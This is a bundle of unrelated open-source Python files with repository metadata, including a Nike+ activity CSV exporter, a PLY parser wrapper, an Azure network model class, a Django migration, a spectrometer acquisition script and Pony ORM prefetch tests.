# Distance will be redundant to kilometers, but leaving both b/c it's
# easier b/c the name_to_api dict is used to pull data from API, map to
# named tuple dynamically, etc. It's just a pain to remove it from here
# and still have a dynamic dict from named tuple, would have to manually
# remove it in a few places which feels hack-ish.
api_values['miles'] = km_to_mi(api_values['distance'])
api_values['kilometers'] = api_values['distance']
api_values['pace'] = calculate_mile_pace(api_values['duration'],
api_values['miles'])
activity = NikePlusActivity(**api_values)
return activity
def get_activities(access_token, start_date=None):
base_url = 'https://api.nike.com'
url = '/v1/me/sport/activities?access_token=%s' % access_token
if start_date is not None:
# FIXME: use re module to assert that it's yyyy-mm-dd
end_date = datetime.today().strftime(DATE_FMT)
url = '%s&startDate=%s&endDate=%s' % (url, start_date, end_date)
# weird required headers, blah.
headers = {'appid':'fuelband', 'Accept':'application/json'}
current_month = None
while url:
req = urllib2.Request('%s%s' % (base_url, url), None, headers)
try:
r = urllib2.urlopen(req)
except urllib2.HTTPError as err:
print 'Failed sending request to "%s":\n%s\n%s\n\n' % (url, err,
err.read())
raise err
resp = json.loads(r.read())
r.close()
data = resp.get('data')
if data is None:
raise StopIteration
for item in resp.get('data'):
activity = decode_activity(item)
yield activity
# pagination
url = None
if resp.get('paging') and resp.get('paging').get('next'):
url = resp.get('paging').get('next')
def main():
args = _parse_args()
activities = get_activities(args['token'], args['since'])
# Print header
activity = activities.next()
print ','.join(activity._fields)
# FIXME: Bug in nikeplus API, if you send request with start/end you'll
# get in an infinite loop telling a new offset for data that doesn't
# exist. For example:
# Request data for 2013-08-15 - 2013-09-01
# Only have data for 2013-08-15 and 2013-08-16
# API keeps returning a new offset each time for 5 more days but
# it continues to return data for the same two days and never stops.
# See nikeplus_api_bug.txt for detailed output of this scenario.
seen_dates = set()
writer = csv.writer(sys.stdout)
for activity in activities:
activity = activity._asdict()
values = [str(value) for value in activity.values()]
# Already seen this date, API is returning duplicate data so must mean
# we've been through it all.
if activity['start_time'] in seen_dates:
break
seen_dates.add(activity['start_time'])
writer.writerow(values)
if __name__ == '__main__':
main()
| {
"content_hash": "5d5a65f6eff4f1a3ee36e187883404b8",
"timestamp": "",
"source": "github",
"line_count": 217,
"max_line_length": 83,
"avg_line_length": 31.493087557603687,
"alnum_prop": 0.5845771144278606,
"repo_name": "durden/nikeplus",
"id": "f5b577ff7be4bcbde82a1b3e16a10f93a8dba53c",
"size": "6858",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "nikeplusapi/export.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "8219"
}
],
"symlink_target": ""
} |
"""Location helpers for Home Assistant."""
from blumate.const import ATTR_LATITUDE, ATTR_LONGITUDE
from blumate.core import State
from blumate.util import location as loc_util
def has_location(state):
"""Test if state contains a valid location."""
return (isinstance(state, State) and
isinstance(state.attributes.get(ATTR_LATITUDE), float) and
isinstance(state.attributes.get(ATTR_LONGITUDE), float))
def closest(latitude, longitude, states):
"""Return closest state to point."""
with_location = [state for state in states if has_location(state)]
if not with_location:
return None
return min(
with_location,
key=lambda state: loc_util.distance(
latitude, longitude, state.attributes.get(ATTR_LATITUDE),
state.attributes.get(ATTR_LONGITUDE))
)
| {
"content_hash": "bbb05f6aa6fa346f5362815b1d1c1b07",
"timestamp": "",
"source": "github",
"line_count": 27,
"max_line_length": 70,
"avg_line_length": 31.48148148148148,
"alnum_prop": 0.6835294117647058,
"repo_name": "bdfoster/blumate",
"id": "9df7e6d6bfd8130b8d7145c772167dd8eac476d0",
"size": "850",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "blumate/helpers/location.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "HTML",
"bytes": "1309487"
},
{
"name": "JavaScript",
"bytes": "10846"
},
{
"name": "Python",
"bytes": "2460958"
},
{
"name": "Ruby",
"bytes": "379"
},
{
"name": "Shell",
"bytes": "6407"
}
],
"symlink_target": ""
} |
import sys
import os
import os.path
import inspect
from ply import lex, yacc
class Parser(object):
"""Wrapper object for PLY lexer/parser."""
exception = ValueError
@classmethod
def _table_name(cls, suffix, relative=False):
"""Return the module name for PLY's parsetab file."""
mname = inspect.getmodule(cls).__name__ + '_' + suffix
if relative:
mname = mname.split('.')[-1]
return mname
@classmethod
def _write_tables(cls):
"""Write parser table (for distribution purposes)."""
path = inspect.getfile(cls)
parent = os.path.split(path)[0]
# Need to change directories to get the file written at the right
# location.
cwd = os.getcwd()
os.chdir(parent)
tabname = cls._table_name('lex', relative=True)
lex.lex(object=cls, lextab=tabname, optimize=True, debug=False)
tabname = cls._table_name('tab', relative=True)
yacc.yacc(module=cls, tabmodule=tabname, optimize=True, debug=False)
os.chdir(cwd)
def parse(self, input, fname=None, debug=False):
optimize = not debug
tabname = self._table_name('lex')
lexer = lex.lex(object=self, lextab=tabname,
optimize=optimize, debug=debug)
if hasattr(input, 'read'):
input = input.read()
lexer.input(input)
self._input = input
self._fname = fname
tabname = self._table_name('tab')
parser = yacc.yacc(module=self, tabmodule=tabname,
optimize=optimize, debug=debug)
parsed = parser.parse(lexer=lexer, tracking=True)
return parsed
def _position(self, o):
if hasattr(o, 'lineno') and hasattr(o, 'lexpos'):
lineno = o.lineno
lexpos = o.lexpos
pos = self._input.rfind('\n', 0, lexpos)
column = lexpos - pos
else:
lineno = None
column = None
return lineno, column
def t_ANY_error(self, t):
err = self.exception()
msg = 'illegal token'
if self._fname:
err.fname = self._fname
msg += ' in file %s' % self._fname
lineno, column = self._position(t)
if lineno is not None and column is not None:
msg += ' at %d:%d' % (lineno, column)
err.lineno = lineno
err.column = column
err.args = (msg,)
raise err
def p_error(self, p):
err = self.exception()
msg = 'syntax error'
if self._fname:
err.fname = self._fname
msg += ' in file %s' % self._fname
lineno, column = self._position(p)
if lineno is not None and column is not None:
msg += ' at %d:%d' % (lineno, column)
err.lineno = lineno
err.column = column
err.args = (msg,)
raise err
| {
"content_hash": "0247af033851db1861cbad5b9fb6f10d",
"timestamp": "",
"source": "github",
"line_count": 90,
"max_line_length": 76,
"avg_line_length": 32.922222222222224,
"alnum_prop": 0.5420182247721903,
"repo_name": "geertj/argproc",
"id": "a748c97e7c11b44128345fbf86d529fd8dc817d7",
"size": "3283",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "lib/argproc/plyparse.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "48169"
}
],
"symlink_target": ""
} |
import _include
from co8Util.Logger import Logger
from co8Util.PersistentData import Co8PersistentData
print "initializing _co8init.py\n"
def save(savename):
## logger = Logger(__name__)
## logger.logme("save:" + savename)
print "Executing Co8 Save Hook\n"
Co8PersistentData.save(savename)
def load(savename):
## logger = Logger(__name__)
## logger.logme("load:" + savename)
Co8PersistentData.load(savename)
def init():
pass
| {
"content_hash": "e001bb081bb69b08a9ad4e8a9101c497",
"timestamp": "",
"source": "github",
"line_count": 18,
"max_line_length": 52,
"avg_line_length": 24.666666666666668,
"alnum_prop": 0.7207207207207207,
"repo_name": "GrognardsFromHell/TemplePlus",
"id": "1f117d6d0980f7af168858aac5337f3043ef6232",
"size": "524",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tpdatasrc/co8fixes/scr/_co8init.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Batchfile",
"bytes": "683"
},
{
"name": "C",
"bytes": "629718"
},
{
"name": "C#",
"bytes": "167885"
},
{
"name": "C++",
"bytes": "10018792"
},
{
"name": "CMake",
"bytes": "91980"
},
{
"name": "CSS",
"bytes": "1292"
},
{
"name": "HLSL",
"bytes": "18884"
},
{
"name": "HTML",
"bytes": "433942"
},
{
"name": "PowerShell",
"bytes": "5374"
},
{
"name": "Python",
"bytes": "2850350"
}
],
"symlink_target": ""
} |
from .resource import Resource
class VirtualNetworkGatewayConnection(Resource):
"""A common class for general resource information.
Variables are only populated by the server, and will be ignored when
sending a request.
:param id: Resource ID.
:type id: str
:ivar name: Resource name.
:vartype name: str
:ivar type: Resource type.
:vartype type: str
:param location: Resource location.
:type location: str
:param tags: Resource tags.
:type tags: dict[str, str]
:param authorization_key: The authorizationKey.
:type authorization_key: str
:param virtual_network_gateway1:
:type virtual_network_gateway1:
~azure.mgmt.network.v2016_09_01.models.VirtualNetworkGateway
:param virtual_network_gateway2:
:type virtual_network_gateway2:
~azure.mgmt.network.v2016_09_01.models.VirtualNetworkGateway
:param local_network_gateway2:
:type local_network_gateway2:
~azure.mgmt.network.v2016_09_01.models.LocalNetworkGateway
:param connection_type: Gateway connection type. Possible values are:
'Ipsec','Vnet2Vnet','ExpressRoute', and 'VPNClient. Possible values
include: 'IPsec', 'Vnet2Vnet', 'ExpressRoute', 'VPNClient'
:type connection_type: str or
~azure.mgmt.network.v2016_09_01.models.VirtualNetworkGatewayConnectionType
:param routing_weight: The routing weight.
:type routing_weight: int
:param shared_key: The IPSec shared key.
:type shared_key: str
:ivar connection_status: Virtual network Gateway connection status.
Possible values are 'Unknown', 'Connecting', 'Connected' and
'NotConnected'. Possible values include: 'Unknown', 'Connecting',
'Connected', 'NotConnected'
:vartype connection_status: str or
~azure.mgmt.network.v2016_09_01.models.VirtualNetworkGatewayConnectionStatus
:ivar tunnel_connection_status: Collection of all tunnels' connection
health status.
:vartype tunnel_connection_status:
list[~azure.mgmt.network.v2016_09_01.models.TunnelConnectionHealth]
:ivar egress_bytes_transferred: The egress bytes transferred in this
connection.
:vartype egress_bytes_transferred: long
:ivar ingress_bytes_transferred: The ingress bytes transferred in this
connection.
:vartype ingress_bytes_transferred: long
:param peer: The reference to peerings resource.
:type peer: ~azure.mgmt.network.v2016_09_01.models.SubResource
:param enable_bgp: EnableBgp flag
:type enable_bgp: bool
:param resource_guid: The resource GUID property of the
VirtualNetworkGatewayConnection resource.
:type resource_guid: str
:ivar provisioning_state: The provisioning state of the
VirtualNetworkGatewayConnection resource. Possible values are: 'Updating',
'Deleting', and 'Failed'.
:vartype provisioning_state: str
:param etag: Gets a unique read-only string that changes whenever the
resource is updated.
:type etag: str
"""
_validation = {
'name': {'readonly': True},
'type': {'readonly': True},
'virtual_network_gateway1': {'required': True},
'connection_type': {'required': True},
'connection_status': {'readonly': True},
'tunnel_connection_status': {'readonly': True},
'egress_bytes_transferred': {'readonly': True},
'ingress_bytes_transferred': {'readonly': True},
'provisioning_state': {'readonly': True},
}
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
'location': {'key': 'location', 'type': 'str'},
'tags': {'key': 'tags', 'type': '{str}'},
'authorization_key': {'key': 'properties.authorizationKey', 'type': 'str'},
'virtual_network_gateway1': {'key': 'properties.virtualNetworkGateway1', 'type': 'VirtualNetworkGateway'},
'virtual_network_gateway2': {'key': 'properties.virtualNetworkGateway2', 'type': 'VirtualNetworkGateway'},
'local_network_gateway2': {'key': 'properties.localNetworkGateway2', 'type': 'LocalNetworkGateway'},
'connection_type': {'key': 'properties.connectionType', 'type': 'str'},
'routing_weight': {'key': 'properties.routingWeight', 'type': 'int'},
'shared_key': {'key': 'properties.sharedKey', 'type': 'str'},
'connection_status': {'key': 'properties.connectionStatus', 'type': 'str'},
'tunnel_connection_status': {'key': 'properties.tunnelConnectionStatus', 'type': '[TunnelConnectionHealth]'},
'egress_bytes_transferred': {'key': 'properties.egressBytesTransferred', 'type': 'long'},
'ingress_bytes_transferred': {'key': 'properties.ingressBytesTransferred', 'type': 'long'},
'peer': {'key': 'properties.peer', 'type': 'SubResource'},
'enable_bgp': {'key': 'properties.enableBgp', 'type': 'bool'},
'resource_guid': {'key': 'properties.resourceGuid', 'type': 'str'},
'provisioning_state': {'key': 'properties.provisioningState', 'type': 'str'},
'etag': {'key': 'etag', 'type': 'str'},
}
def __init__(self, virtual_network_gateway1, connection_type, id=None, location=None, tags=None, authorization_key=None, virtual_network_gateway2=None, local_network_gateway2=None, routing_weight=None, shared_key=None, peer=None, enable_bgp=None, resource_guid=None, etag=None):
super(VirtualNetworkGatewayConnection, self).__init__(id=id, location=location, tags=tags)
self.authorization_key = authorization_key
self.virtual_network_gateway1 = virtual_network_gateway1
self.virtual_network_gateway2 = virtual_network_gateway2
self.local_network_gateway2 = local_network_gateway2
self.connection_type = connection_type
self.routing_weight = routing_weight
self.shared_key = shared_key
self.connection_status = None
self.tunnel_connection_status = None
self.egress_bytes_transferred = None
self.ingress_bytes_transferred = None
self.peer = peer
self.enable_bgp = enable_bgp
self.resource_guid = resource_guid
self.provisioning_state = None
self.etag = etag
| {
"content_hash": "189d04234b114c499de5a9e9b3e876e4",
"timestamp": "",
"source": "github",
"line_count": 125,
"max_line_length": 282,
"avg_line_length": 49.8,
"alnum_prop": 0.6729317269076305,
"repo_name": "AutorestCI/azure-sdk-for-python",
"id": "eafc299d245401ac96e46e4ab7b9e6dbe3980592",
"size": "6699",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "azure-mgmt-network/azure/mgmt/network/v2016_09_01/models/virtual_network_gateway_connection.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "34619070"
}
],
"symlink_target": ""
} |
from core.himesis import Himesis, HimesisPreConditionPatternLHS
import uuid
class HSS1_if_ConnectedLHS(HimesisPreConditionPatternLHS):
def __init__(self):
"""
Creates the himesis graph representing the AToM3 model HSS1_if_ConnectedLHS.
"""
# Flag this instance as compiled now
self.is_compiled = True
super(HSS1_if_ConnectedLHS, self).__init__(name='HSS1_if_ConnectedLHS', num_nodes=0, edges=[])
# Set the graph attributes
self["mm__"] = ['MT_pre__FamiliesToPersonsMM', 'MoTifRule']
self["MT_constraint__"] = """#===============================================================================
# This code is executed after the nodes in the LHS have been matched.
# You can access a matched node labelled n by: PreNode('n').
# To access attribute x of node n, use: PreNode('n')['x'].
# The given constraint must evaluate to a boolean expression:
# returning True enables the rule to be applied,
# returning False forbids the rule from being applied.
#===============================================================================
return True
"""
self["name"] = """"""
self["GUID__"] = uuid.uuid3(uuid.NAMESPACE_DNS,'SS1_if')
# Set the node attributes
# Nodes that represent the edges of the property.
# Add the edges
self.add_edges([
])
# Add the attribute equations
self["equations"] = []
def constraint(self, PreNode, graph):
"""
Executable constraint code.
@param PreNode: Function taking an integer as parameter
and returns the node corresponding to that label.
"""
#===============================================================================
# This code is executed after the nodes in the LHS have been matched.
# You can access a matched node labelled n by: PreNode('n').
# To access attribute x of node n, use: PreNode('n')['x'].
# The given constraint must evaluate to a boolean expression:
# returning True enables the rule to be applied,
# returning False forbids the rule from being applied.
#===============================================================================
return True
| {
"content_hash": "f1a3dd39ecdb670ff3d339c15e1b1bd6",
"timestamp": "",
"source": "github",
"line_count": 61,
"max_line_length": 125,
"avg_line_length": 43.19672131147541,
"alnum_prop": 0.4713472485768501,
"repo_name": "levilucio/SyVOLT",
"id": "cbebf0b1beeed3802405548d555d5c18204f4c10",
"size": "2635",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "UMLRT2Kiltera_MM/Properties/from_thesis/HSS1_if_ConnectedLHS.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Assembly",
"bytes": "166159"
},
{
"name": "Python",
"bytes": "34207588"
},
{
"name": "Shell",
"bytes": "1118"
}
],
"symlink_target": ""
} |
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding model 'Event'
db.create_table(u'events_event', (
(u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('who', self.gf('django.db.models.fields.related.ForeignKey')(default=None, to=orm['auth.User'], null=True)),
('recorded_time', self.gf('django.db.models.fields.DateTimeField')(auto_now_add=True, blank=True)),
('when', self.gf('django.db.models.fields.DateTimeField')(null=True, blank=True)),
('category', self.gf('django.db.models.fields.CharField')(max_length=64, null=True, blank=True)),
('action', self.gf('django.db.models.fields.CharField')(max_length=64, null=True, blank=True)),
('label', self.gf('django.db.models.fields.CharField')(max_length=64, null=True, blank=True)),
('what', self.gf('django.db.models.fields.CharField')(max_length=255, null=True, blank=True)),
))
db.send_create_signal(u'events', ['Event'])
def backwards(self, orm):
# Deleting model 'Event'
db.delete_table(u'events_event')
models = {
u'auth.group': {
'Meta': {'object_name': 'Group'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
u'auth.permission': {
'Meta': {'ordering': "(u'content_type__app_label', u'content_type__model', u'codename')", 'unique_together': "((u'content_type', u'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['contenttypes.ContentType']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
u'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
u'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
u'events.event': {
'Meta': {'object_name': 'Event'},
'action': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True', 'blank': 'True'}),
'category': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'label': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True', 'blank': 'True'}),
'recorded_time': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'what': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'when': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'who': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'to': u"orm['auth.User']", 'null': 'True'})
}
}
complete_apps = ['events'] | {
"content_hash": "82a8d1e3d71a13fbd044e274d2242a4c",
"timestamp": "",
"source": "github",
"line_count": 79,
"max_line_length": 187,
"avg_line_length": 68.69620253164557,
"alnum_prop": 0.5638474295190713,
"repo_name": "alexlovelltroy/django-telemetry",
"id": "0f3cec9a3d60644f1b42857873b22d073374c28e",
"size": "5451",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "telemetry/events/migrations/0001_initial.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "1541"
},
{
"name": "JavaScript",
"bytes": "127353"
},
{
"name": "Python",
"bytes": "22488"
}
],
"symlink_target": ""
} |
"""A sample application for cmd2 that explores a GNU Readline bug related to ANSI color escape codes.
"""
import colorama
from colorama import Fore
from cmd2 import Cmd, make_option, options
class CmdLineApp(Cmd):
""" Example cmd2 application. """
def __init__(self):
# Set use_ipython to True to enable the "ipy" command for entering an embedded IPython shell
Cmd.__init__(self)
self.prompt = '(cmd2) ' + Fore.CYAN + '1' + Fore.RESET + '> '
if __name__ == '__main__':
colorama.init(autoreset=True)
c = CmdLineApp()
c.cmdloop()
| {
"content_hash": "36e5d962d16795ab1c498f6ad66129d3",
"timestamp": "",
"source": "github",
"line_count": 20,
"max_line_length": 101,
"avg_line_length": 28.85,
"alnum_prop": 0.6447140381282496,
"repo_name": "tleonhardt/CodingPlayground",
"id": "1fe9a9f574d6b1e20b9dbc6cc02911492a1836ca",
"size": "615",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "python/cmd2/ColorPrompt.py",
"mode": "33261",
"license": "mit",
"language": [
{
"name": "C",
"bytes": "30533"
},
{
"name": "C++",
"bytes": "2514"
},
{
"name": "CMake",
"bytes": "3607"
},
{
"name": "Cython",
"bytes": "3972"
},
{
"name": "HTML",
"bytes": "1700"
},
{
"name": "Jupyter Notebook",
"bytes": "2056095"
},
{
"name": "Makefile",
"bytes": "161"
},
{
"name": "Python",
"bytes": "244507"
},
{
"name": "Ruby",
"bytes": "296"
},
{
"name": "SWIG",
"bytes": "1120"
},
{
"name": "Shell",
"bytes": "893"
}
],
"symlink_target": ""
} |
"""Support for the light on the Sisyphus Kinetic Art Table."""
import logging
import aiohttp
from homeassistant.components.light import SUPPORT_BRIGHTNESS, Light
from homeassistant.const import CONF_HOST
from homeassistant.exceptions import PlatformNotReady
from . import DATA_SISYPHUS
_LOGGER = logging.getLogger(__name__)
SUPPORTED_FEATURES = SUPPORT_BRIGHTNESS
async def async_setup_platform(hass, config, add_entities,
discovery_info=None):
"""Set up a single Sisyphus table."""
host = discovery_info[CONF_HOST]
try:
table_holder = hass.data[DATA_SISYPHUS][host]
table = await table_holder.get_table()
except aiohttp.ClientError:
raise PlatformNotReady()
add_entities(
[SisyphusLight(table_holder.name, table)],
update_before_add=True)
class SisyphusLight(Light):
"""Representation of a Sisyphus table as a light."""
def __init__(self, name, table):
"""Initialize the Sisyphus table."""
self._name = name
self._table = table
async def async_added_to_hass(self):
"""Add listeners after this object has been initialized."""
self._table.add_listener(
lambda: self.async_schedule_update_ha_state(False))
@property
def available(self):
"""Return true if the table is responding to heartbeats."""
return self._table.is_connected
@property
def unique_id(self):
"""Return the UUID of the table."""
return self._table.id
@property
def name(self):
"""Return the ame of the table."""
return self._name
@property
def is_on(self):
"""Return True if the table is on."""
return not self._table.is_sleeping
@property
def brightness(self):
"""Return the current brightness of the table's ring light."""
return self._table.brightness * 255
@property
def supported_features(self):
"""Return the features supported by the table; i.e. brightness."""
return SUPPORTED_FEATURES
async def async_turn_off(self, **kwargs):
"""Put the table to sleep."""
await self._table.sleep()
_LOGGER.debug("Sisyphus table %s: sleep")
async def async_turn_on(self, **kwargs):
"""Wake up the table if necessary, optionally changes brightness."""
if not self.is_on:
await self._table.wakeup()
_LOGGER.debug("Sisyphus table %s: wakeup")
if "brightness" in kwargs:
await self._table.set_brightness(kwargs["brightness"] / 255.0)
| {
"content_hash": "579fb4992e2eb100ca5534dcd23a3b7a",
"timestamp": "",
"source": "github",
"line_count": 87,
"max_line_length": 76,
"avg_line_length": 29.885057471264368,
"alnum_prop": 0.6342307692307693,
"repo_name": "jabesq/home-assistant",
"id": "9ad36df6118e551a6047710b5e8abc3a8be89985",
"size": "2600",
"binary": false,
"copies": "1",
"ref": "refs/heads/dev",
"path": "homeassistant/components/sisyphus/light.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Batchfile",
"bytes": "1175"
},
{
"name": "Dockerfile",
"bytes": "1829"
},
{
"name": "Python",
"bytes": "16238292"
},
{
"name": "Ruby",
"bytes": "745"
},
{
"name": "Shell",
"bytes": "17615"
}
],
"symlink_target": ""
} |
"""
Script to get spectrum from OceanOptics Spectroscope over time
Things to modify before use:
- gid and uid of current user
"""
from __future__ import print_function
from builtins import str
from builtins import range
import sys, os
base_dir = os.path.dirname(os.path.realpath(__file__))
root_dir = os.path.abspath(os.path.join(base_dir, "..", "..", "helpers"))
sys.path.insert(0, root_dir)
from getSpectra import Icecube
from time import sleep
import argparse
import os
import time
import numpy as np
import pwd
import grp
import datetime
def main(n, description, intTime, interval):
c = 0
foldername = "{}_Group".format(time.strftime("%Y%m%d_%H%M%S"))
uid = pwd.getpwnam("sunyudong").pw_uid
gid = grp.getgrnam("sunyudong").gr_gid
# Sanity checking of inputs
if interval < intTime:
raise ValueError(f"interval = {interval}; intTime = {intTime}; Interval timing should be more than intTime.")
if n < 1:
raise ValueError(f"n = {n}; n must be at least 1.")
os.mkdir(foldername)
path = foldername
os.chown(path, uid, gid)
with open("{}/meta.info".format(foldername), 'w') as f:
meta = "{}\tintTime = {} ms\tInterval = {}ms\t{}\n".format(foldername, intTime, interval, description)
f.write(meta)
print(meta)
os.chown("{}/meta.info".format(foldername), uid, gid)
with Icecube() as cube:
# Write model information into meta.info
with open("{}/meta.info".format(foldername), 'a') as f:
f.write("Serial ({}) = {}\n".format(cube.type, cube.getSerial()))
f.write("Autonulling Factor = {}".format(cube.autonulling))
# Write some metadata about corrections
with open("{}/linearity.corr".format(foldername), 'a') as f:
f.write("Linearity Correction -> {}th Order Polynomial\n".format(cube.getSingleEEPROM(14)))
for i in range(6, 14):
f.write("{}\t{}\n".format(i - 6, cube.getSingleEEPROM(i)))
os.chown("{}/linearity.corr".format(foldername), uid, gid)
with open("{}/wavelength.corr".format(foldername), 'a') as f:
f.write("Wavelength Correction\n")
for i in range(1, 5):
f.write("{}\t{}\n".format(i - 1, cube.getSingleEEPROM(i)))
os.chown("{}/wavelength.corr".format(foldername), uid, gid)
cube.setIntegrationTime(intTime)
totalSet = False
delta = datetime.timedelta(milliseconds = interval)
while True:
try:
if n == 0:
print("\nAcquisition Complete")
break
if not totalSet:
count = 0
total = n
digits = int(np.floor(np.log10(total)) + 1)
# http://www.kahfei.com/2011/03/11/print-without-newline-in-python/
printString = "[{:>10} degC] Acquiring [{:>"+ str(digits) +"}/{}] Left: {}\033[K\r"
totalSet = True
now = datetime.datetime.now()
if n == total or now >= prevStart + delta:
count += 1
# print(printString)
print(printString.format(str(cube.getTemp()), count, total, n - 1), end=' ')
prevStart = datetime.datetime.now()
spec = cube.getSpectra()
with open("{}/data_{}".format(foldername, n) , 'w') as f:
f.write("# {}".format(prevStart))
for i in spec:
f.write("{}\t{}\n".format(i[0], i[1]))
os.chown("{}/data_{}".format(foldername,n), uid, gid)
n -= 1
except KeyboardInterrupt:
cube.releaseInterface(0)
cube.close()
print("\n --- EXITING --- ")
sys.exit()
def init():
parser = argparse.ArgumentParser()
parser.add_argument('n', type = int, help = "no. of readings to take. Positive integers only")
parser.add_argument('-d', '--description', type = str, help = "label each acquisition", default = None)
parser.add_argument('-t', '--intTime', type = float, help = "milliseconds of integration time", default = 2)
parser.add_argument('-i', '--interval', type = float, help = "Interval in milliseconds between start of acquisitions. Must be more than integration time.", default = 2)
args = parser.parse_args()
main(args.n, args.description, args.intTime, args.interval)
init()
| {
"content_hash": "78f5f4acb5b21d3da280145ebfa94ff4",
"timestamp": "",
"source": "github",
"line_count": 118,
"max_line_length": 172,
"avg_line_length": 38.55084745762712,
"alnum_prop": 0.5647395031875138,
"repo_name": "sunjerry019/photonLauncher",
"id": "e3a311c6637a4a2c5cb439c4a14b23301b32b433",
"size": "4573",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "oceanoptics/get/intervalSpec.py",
"mode": "33261",
"license": "apache-2.0",
"language": [
{
"name": "C",
"bytes": "199131"
},
{
"name": "C++",
"bytes": "58658"
},
{
"name": "Gnuplot",
"bytes": "1621"
},
{
"name": "HTML",
"bytes": "10384"
},
{
"name": "Makefile",
"bytes": "140"
},
{
"name": "Python",
"bytes": "496455"
},
{
"name": "QMake",
"bytes": "5322"
},
{
"name": "Shell",
"bytes": "8049"
},
{
"name": "Tcl",
"bytes": "104446"
},
{
"name": "TeX",
"bytes": "20115"
}
],
"symlink_target": ""
} |
import sys, unittest
from decimal import Decimal
from datetime import date
from pony.orm import *
from pony.orm.tests.testutils import *
db = Database('sqlite', ':memory:')
class Student(db.Entity):
name = Required(str)
scholarship = Optional(int)
gpa = Optional(Decimal, 3, 1)
dob = Optional(date)
group = Required('Group')
courses = Set('Course')
biography = Optional(LongStr)
class Group(db.Entity):
number = PrimaryKey(int)
major = Required(str)
students = Set(Student)
class Course(db.Entity):
name = Required(str, unique=True)
students = Set(Student)
db.generate_mapping(create_tables=True)
with db_session:
g1 = Group(number=1, major='Math')
g2 = Group(number=2, major='Computer Sciense')
c1 = Course(name='Math')
c2 = Course(name='Physics')
c3 = Course(name='Computer Science')
Student(id=1, name='S1', group=g1, gpa=3.1, courses=[c1, c2], biography='some text')
Student(id=2, name='S2', group=g1, gpa=3.2, scholarship=100, dob=date(2000, 1, 1))
Student(id=3, name='S3', group=g1, gpa=3.3, scholarship=200, dob=date(2001, 1, 2), courses=[c2, c3])
class TestPrefetching(unittest.TestCase):
def test_1(self):
with db_session:
s1 = Student.select().first()
g = s1.group
self.assertEqual(g.major, 'Math')
@raises_exception(DatabaseSessionIsOver, 'Cannot load attribute Group[1].major: the database session is over')
def test_2(self):
with db_session:
s1 = Student.select().first()
g = s1.group
g.major
def test_3(self):
with db_session:
s1 = Student.select().prefetch(Group).first()
g = s1.group
self.assertEqual(g.major, 'Math')
